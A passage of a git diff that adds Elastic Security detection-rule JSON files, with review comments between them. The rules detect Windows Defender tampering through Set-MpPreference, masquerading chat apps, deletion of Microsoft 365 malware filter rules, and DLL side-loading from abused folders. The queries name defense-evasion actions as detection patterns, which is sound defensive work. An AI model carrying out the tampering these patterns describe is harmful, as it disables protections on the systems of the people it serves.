which action was executed. Based on that, examine exceptions, antivirus state, sample submission, etc.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
Analysts can dismiss the alert if the administrator is aware of the activity, the configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting), and no other suspicious activity has been observed.\n\n### Related rules\n\n- Windows Defender Disabled via Registry Modification - 2ffa1f1e-b6db-47fa-994b-1512743847eb\n- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Based on the command line, take actions to restore the appropriate Windows Defender antivirus configurations.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (\n process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") or\n ?process.pe.original_file_name in (\"powershell.exe\", \"pwsh.dll\", \"powershell_ise.exe\")\n ) and\n process.args : \"Set-MpPreference\" and process.args : (\"-Disable*\", \"Disabled\", \"NeverSend\", \"-Exclusion*\")\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2019-ps" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c8cccb06-faf2-4cd5-886e-2c9636cfcb87", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on 
adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "c8cccb06-faf2-4cd5-886e-2c9636cfcb87_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_5.json b/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_5.json new file mode 100644 index 00000000000..30c30c46a0c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_5.json 
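Review bot: The `process.args` clause in the new `query` matches the parameter names `-Disable*` and `-Exclusion*` without regard to the value that follows them, so an administrator restoring protection with, for example, `Set-MpPreference -DisableRealtimeMonitoring $false` raises the same alert as the tampering the `description` targets. The `false_positives` entry only says "Planned Windows Defender configuration changes", which does not make this distinction visible to a triage analyst. Consider adding a `false_positives` item such as `"Re-enabling a previously disabled Defender feature with the same parameter name (for example a -Disable* parameter set to $false) matches this rule."` and a bullet in the `note` investigation steps asking the analyst to check the argument value, not just the parameter name. The same query text appears in the _109 version of this rule, whose hunk begins before this chunk.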
@@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious instances of communications apps, both unsigned and renamed ones, that can indicate an attempt to conceal malicious activity, bypass security features such as allowlists, or trick users into executing malware.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Masquerading as Communication Apps", + "query": "process where host.os.type == \"windows\" and\n event.type == \"start\" and\n (\n /* Slack */\n (process.name : \"slack.exe\" and not\n (process.code_signature.subject_name in (\n \"Slack Technologies, Inc.\",\n \"Slack Technologies, LLC\"\n ) and process.code_signature.trusted == true)\n ) or\n\n /* WebEx */\n (process.name : \"WebexHost.exe\" and not\n (process.code_signature.subject_name in (\"Cisco WebEx LLC\", \"Cisco Systems, Inc.\") and process.code_signature.trusted == true)\n ) or\n\n /* Teams */\n (process.name : \"Teams.exe\" and not\n (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true)\n ) or\n\n /* Discord */\n (process.name : \"Discord.exe\" and not\n (process.code_signature.subject_name == \"Discord Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* RocketChat */\n (process.name : \"Rocket.Chat.exe\" and not\n (process.code_signature.subject_name == \"Rocket.Chat Technologies Corp.\" and process.code_signature.trusted == true)\n ) or\n\n /* Mattermost */\n (process.name : \"Mattermost.exe\" and not\n (process.code_signature.subject_name == \"Mattermost, Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* WhatsApp */\n (process.name : \"WhatsApp.exe\" and not\n (process.code_signature.subject_name in (\n \"WhatsApp LLC\",\n \"WhatsApp, Inc\",\n \"24803D75-212C-471A-BC57-9EF86AB91435\"\n ) and process.code_signature.trusted == true)\n ) or\n\n /* Zoom */\n 
(process.name : \"Zoom.exe\" and not\n (process.code_signature.subject_name == \"Zoom Video Communications, Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* Outlook */\n (process.name : \"outlook.exe\" and not\n (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true)\n ) or\n\n /* Thunderbird */\n (process.name : \"thunderbird.exe\" and not\n (process.code_signature.subject_name == \"Mozilla Corporation\" and process.code_signature.trusted == true)\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c9482bfa-a553-4226-8ea2-4959bd4f7923", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + }, + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": 
"https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1554", + "name": "Compromise Client Software Binary", + "reference": "https://attack.mitre.org/techniques/T1554/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "c9482bfa-a553-4226-8ea2-4959bd4f7923_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_103.json b/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_103.json new file mode 100644 index 00000000000..83d9bff20d9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_103.json 
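Review bot: Every branch of the new `query` alerts whenever the `and process.code_signature.trusted == true` conjunction is not satisfied, so a signer string that no longer matches the hard-coded list (the Slack entry already needs both "Slack Technologies, Inc." and "Slack Technologies, LLC") or, as far as I can tell from the `not (...)` form, an event whose code-signature fields are absent will fire exactly like a renamed binary — worth confirming against EQL's null handling. Unlike the neighbouring rules in this commit, this rule ships with no `note` investigation guide and no `false_positives` entry, so an analyst has nothing to distinguish those cases from masquerading. Suggest a `false_positives` item along the lines of `"Legitimate vendor builds signed under a new legal entity name, or process events without code-signature data, match this rule."` and a short `note` telling analysts to verify `process.code_signature.subject_name`, `process.code_signature.status` and the file hash before escalating.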
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a malware filter rule has been deleted or disabled in Microsoft 365. An adversary or insider threat may want to modify a malware filter rule to evade detection.", + "false_positives": [ + "A malware filter rule may be deleted by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Malware Filter Rule Modification", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Remove-MalwareFilterRule\" or \"Disable-MalwareFilterRule\") and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-malwarefilterrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-malwarefilterrule?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ca79768e-40e1-4e45-a097-0e5fbc876ac2", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Defense Evasion" + ], + "threat": [ + { + 
"framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "ca79768e-40e1-4e45-a097-0e5fbc876ac2_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_105.json b/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_105.json new file mode 100644 index 00000000000..70473881c8a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_105.json 
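Review bot: `"note": ""` leaves this rule with no triage guidance, while its `false_positives` text already tells the analyst to "Verify that the configuration change was expected" without saying how; the _105 and _206 versions of this file added in the same commit carry the same empty `note`. A `note` of a few lines describing which actor and target details in the `o365.audit` event to pivot on, whether a replacement filter rule was created, and that remediation means restoring the removed or disabled malware filter rule would bring it in line with the other rules here. Separately, the query keys on `event.outcome:success` only, so failed attempts to remove or disable a filter rule are never surfaced; if that is intentional, a sentence in the `description` saying so would help.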
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a malware filter rule has been deleted or disabled in Microsoft 365. An adversary or insider threat may want to modify a malware filter rule to evade detection.", + "false_positives": [ + "A malware filter rule may be deleted by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Malware Filter Rule Modification", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Remove-MalwareFilterRule\" or \"Disable-MalwareFilterRule\") and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-malwarefilterrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-malwarefilterrule?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ca79768e-40e1-4e45-a097-0e5fbc876ac2", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Defense Evasion" + ], + "threat": [ + { + 
"framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "ca79768e-40e1-4e45-a097-0e5fbc876ac2_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_206.json b/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_206.json new file mode 100644 index 00000000000..a0b398d0fb3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_206.json 
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a malware filter rule has been deleted or disabled in Microsoft 365. An adversary or insider threat may want to modify a malware filter rule to evade detection.", + "false_positives": [ + "A malware filter rule may be deleted by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Malware Filter Rule Modification", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Remove-MalwareFilterRule\" or \"Disable-MalwareFilterRule\") and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-malwarefilterrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-malwarefilterrule?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ca79768e-40e1-4e45-a097-0e5fbc876ac2", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Defense Evasion" + ], + "threat": [ + { + 
"framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "ca79768e-40e1-4e45-a097-0e5fbc876ac2_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_7.json b/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_7.json new file mode 100644 index 00000000000..55a192e0e73 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_7.json 
@@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a Windows trusted program running from locations often abused by adversaries to masquerade as a trusted program and loading a recently dropped DLL. This behavior may indicate an attempt to evade defenses via side-loading a malicious DLL within the memory space of a signed processes.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unsigned DLL Side-Loading from a Suspicious Folder", + "query": "library where host.os.type == \"windows\" and\n\n process.code_signature.trusted == true and \n \n (dll.Ext.relative_file_creation_time <= 500 or dll.Ext.relative_file_name_modify_time <= 500) and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\", \"errorChaining\") and \n \n /* Suspicious Paths */\n dll.path : (\"?:\\\\PerfLogs\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Pictures\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Music\\\\*.dll\",\n \"?:\\\\Users\\\\Public\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Documents\\\\*.dll\",\n \"?:\\\\Windows\\\\Tasks\\\\*.dll\",\n \"?:\\\\Windows\\\\System32\\\\Tasks\\\\*.dll\",\n \"?:\\\\Intel\\\\*.dll\",\n \"?:\\\\AMD\\\\Temp\\\\*.dll\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceState\\\\*.dll\",\n \"?:\\\\Windows\\\\security\\\\*.dll\",\n\t\t \"?:\\\\Windows\\\\System\\\\*.dll\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*.dll\",\n \"?:\\\\Windows\\\\Branding\\\\*.dll\",\n \"?:\\\\Windows\\\\csc\\\\*.dll\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*.dll\",\n \"?:\\\\Windows\\\\en-US\\\\*.dll\",\n \"?:\\\\Windows\\\\wlansvc\\\\*.dll\",\n \"?:\\\\Windows\\\\Prefetch\\\\*.dll\",\n \"?:\\\\Windows\\\\Fonts\\\\*.dll\",\n \"?:\\\\Windows\\\\diagnostics\\\\*.dll\",\n \"?:\\\\Windows\\\\TAPI\\\\*.dll\",\n \"?:\\\\Windows\\\\INF\\\\*.dll\",\n \"?:\\\\windows\\\\tracing\\\\*.dll\",\n 
\"?:\\\\windows\\\\IME\\\\*.dll\",\n \"?:\\\\Windows\\\\Performance\\\\*.dll\",\n \"?:\\\\windows\\\\intel\\\\*.dll\",\n \"?:\\\\windows\\\\ms\\\\*.dll\",\n \"?:\\\\Windows\\\\dot3svc\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceProfiles\\\\*.dll\",\n \"?:\\\\Windows\\\\panther\\\\*.dll\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*.dll\",\n \"?:\\\\Windows\\\\OCR\\\\*.dll\",\n \"?:\\\\Windows\\\\appcompat\\\\*.dll\",\n \"?:\\\\Windows\\\\apppatch\\\\*.dll\",\n \"?:\\\\Windows\\\\addins\\\\*.dll\",\n \"?:\\\\Windows\\\\Setup\\\\*.dll\",\n \"?:\\\\Windows\\\\Help\\\\*.dll\",\n \"?:\\\\Windows\\\\SKB\\\\*.dll\",\n \"?:\\\\Windows\\\\Vss\\\\*.dll\",\n \"?:\\\\Windows\\\\Web\\\\*.dll\",\n \"?:\\\\Windows\\\\servicing\\\\*.dll\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*.dll\",\n \"?:\\\\Windows\\\\Logs\\\\*.dll\",\n \"?:\\\\Windows\\\\WaaS\\\\*.dll\",\n \"?:\\\\Windows\\\\twain_32\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*.dll\",\n \"?:\\\\Windows\\\\PLA\\\\*.dll\",\n \"?:\\\\Windows\\\\Migration\\\\*.dll\",\n \"?:\\\\Windows\\\\debug\\\\*.dll\",\n \"?:\\\\Windows\\\\Cursors\\\\*.dll\",\n \"?:\\\\Windows\\\\Containers\\\\*.dll\",\n \"?:\\\\Windows\\\\Boot\\\\*.dll\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*.dll\",\n \"?:\\\\Windows\\\\TextInput\\\\*.dll\",\n \"?:\\\\Windows\\\\schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\SchCache\\\\*.dll\",\n \"?:\\\\Windows\\\\Resources\\\\*.dll\",\n \"?:\\\\Windows\\\\rescache\\\\*.dll\",\n \"?:\\\\Windows\\\\Provisioning\\\\*.dll\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*.dll\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*.dll\",\n \"?:\\\\Windows\\\\media\\\\*.dll\",\n \"?:\\\\Windows\\\\Globalization\\\\*.dll\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*.dll\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*.dll\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*.dll\",\n \"?:\\\\$Recycle.Bin\\\\*.dll\") and \n\t \n\t /* DLL loaded from the process.executable current 
directory */\n\t endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "dll.Ext.relative_file_creation_time", + "type": "unknown" + }, + { + "ecs": false, + "name": "dll.Ext.relative_file_name_modify_time", + "type": "unknown" + }, + { + "ecs": true, + "name": "dll.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ca98c7cf-a56e-4057-a4e8-39603f7f0389", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", 
+ "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.002", + "name": "DLL Side-Loading", + "reference": "https://attack.mitre.org/techniques/T1574/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "ca98c7cf-a56e-4057-a4e8-39603f7f0389_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_8.json b/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_8.json new file mode 100644 index 00000000000..cc303153257 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_8.json 
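Review bot: The `500` threshold on `dll.Ext.relative_file_creation_time` / `dll.Ext.relative_file_name_modify_time` has no unit stated anywhere in the rule, and both fields are declared `"ecs": false` with `"type": "unknown"` in `required_fields`, so a reader cannot tell what "recently dropped" in the `description` actually means. The rule has no `note`; a one-line addition to the `description`, e.g. `A DLL is considered recently dropped when the Elastic Defend relative creation or modification time is at or below 500 (presumably seconds — confirm against the Defend schema).`, would close that gap. The same applies to the _8 version of this file in this commit, which only narrows `index` to `logs-endpoint.events.library-*`. Minor: the embedded `query` string mixes literal tabs (`\t\t`) with spaces inside the `dll.path` list; since the query text is shown verbatim in Kibana, it is worth normalising.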
@@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a Windows trusted program running from locations often abused by adversaries to masquerade as a trusted program and loading a recently dropped DLL. This behavior may indicate an attempt to evade defenses via side-loading a malicious DLL within the memory space of a signed processes.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.library-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unsigned DLL Side-Loading from a Suspicious Folder", + "query": "library where host.os.type == \"windows\" and\n\n process.code_signature.trusted == true and \n \n (dll.Ext.relative_file_creation_time <= 500 or dll.Ext.relative_file_name_modify_time <= 500) and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\", \"errorChaining\") and \n \n /* Suspicious Paths */\n dll.path : (\"?:\\\\PerfLogs\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Pictures\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Music\\\\*.dll\",\n \"?:\\\\Users\\\\Public\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Documents\\\\*.dll\",\n \"?:\\\\Windows\\\\Tasks\\\\*.dll\",\n \"?:\\\\Windows\\\\System32\\\\Tasks\\\\*.dll\",\n \"?:\\\\Intel\\\\*.dll\",\n \"?:\\\\AMD\\\\Temp\\\\*.dll\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceState\\\\*.dll\",\n \"?:\\\\Windows\\\\security\\\\*.dll\",\n\t\t \"?:\\\\Windows\\\\System\\\\*.dll\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*.dll\",\n \"?:\\\\Windows\\\\Branding\\\\*.dll\",\n \"?:\\\\Windows\\\\csc\\\\*.dll\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*.dll\",\n \"?:\\\\Windows\\\\en-US\\\\*.dll\",\n \"?:\\\\Windows\\\\wlansvc\\\\*.dll\",\n \"?:\\\\Windows\\\\Prefetch\\\\*.dll\",\n \"?:\\\\Windows\\\\Fonts\\\\*.dll\",\n \"?:\\\\Windows\\\\diagnostics\\\\*.dll\",\n \"?:\\\\Windows\\\\TAPI\\\\*.dll\",\n \"?:\\\\Windows\\\\INF\\\\*.dll\",\n \"?:\\\\windows\\\\tracing\\\\*.dll\",\n 
